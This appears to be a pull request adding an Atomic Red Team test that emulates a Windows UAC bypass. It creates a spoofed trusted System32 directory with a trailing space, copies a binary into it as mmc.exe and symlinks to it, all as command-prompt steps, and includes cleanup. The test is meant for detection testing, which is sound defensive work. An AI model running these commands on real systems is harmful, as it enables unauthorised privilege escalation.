### PR TITLE
T1088 mocking trusted directories - New Atomic

### DIFF
--- a/atomics/T1088/T1088.yaml
+++ b/atomics/T1088/T1088.yaml
@@ -113,7 +113,7 @@ atomic_tests:
 
 - name: Bypass UAC by Mocking Trusted Directories
   description: |
-    Creates a fake "trusted directory" and copies a binary to bypass UAC
+    Creates a fake "trusted directory" and copies a binary to bypass UAC. The UAC bypass may not work on fully patched systems, however the directory structure will be created.
 
   supported_platforms:
     - windows
@@ -122,12 +122,15 @@ atomic_tests:
     executable_binary:
       description: Binary to execute with UAC Bypass
       type: path
-      default: C:\Windows\System32\mmc.exe
+      default: C:\Windows\System32\cmd.exe
 
   executor:
     name: command_prompt
-    elevation_required: false
+    elevation_required: true
     command: |
-      mkdir "\\?\C:\Windows\System32 \"
-      copy C:\Windows\System32\mmc.exe "\\?\C:\Windows\System32 \"
-      mklink c:\Users\dwhite\Desktop\testbypass.exe ""\\?\C:\Windows\System32 \mmc.exe"
+      mkdir "\\?\C:\Windows \System32\"
+      copy "#{executable_binary}" "\\?\C:\Windows \System32\mmc.exe"
+      mklink c:\testbypass.exe "\\?\C:\Windows \System32\mmc.exe"
+    cleanup_command: |
+      rd "\\?\C:\Windows \" /S /Q
+      del "c:\temp\testbypass.exe"

--- a/atomics/T1088/T1088.yaml
+++ b/atomics/T1088/T1088.yaml
@@ -110,3 +110,24 @@ atomic_tests:
       Start-Process "C:\Windows\System32\ComputerDefaults.exe"
     cleanup_command: |
       Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse
+
+- name: Bypass UAC by Mocking Trusted Directories
+  description: |
+    Creates a fake "trusted directory" and copies a binary to bypass UAC
+
+  supported_platforms:
+    - windows
+
+  input_arguments:
+    executable_binary:
+      description: Binary to execute with UAC Bypass
+      type: path
+      default: C:\Windows\System32\mmc.exe
+
+  executor:
+    name: command_prompt
+    elevation_required: false
+    command: |
+      mkdir "\\?\C:\Windows\System32 \"
+      copy C:\Windows\System32\mmc.exe "\\?\C:\Windows\System32 \"
+      mklink c:\Users\dwhite\Desktop\testbypass.exe ""\\?\C:\Windows\System32 \mmc.exe"

--- a/atomics/T1088/T1088.yaml
+++ b/atomics/T1088/T1088.yaml
@@ -133,4 +133,4 @@ atomic_tests:
       mklink c:\testbypass.exe "\\?\C:\Windows \System32\mmc.exe"
     cleanup_command: |
       rd "\\?\C:\Windows \" /S /Q
-      del "c:\temp\testbypass.exe"
+      del "c:\testbypass.exe"


### PR DESCRIPTION
**Details:**
This atomic is designed to create a fake "trusted directory" and copies a binary to bypass UAC. The UAC bypass may not work on fully patched systems, however the directory structure will be created allowing for detection testing.

**Testing:**
Tested manually on Windows 10 VM. No issues noted other than this "exploit" does not successfully bypass UAC on a fully patched system. This was not deemed required for the purpose of testing detections however.
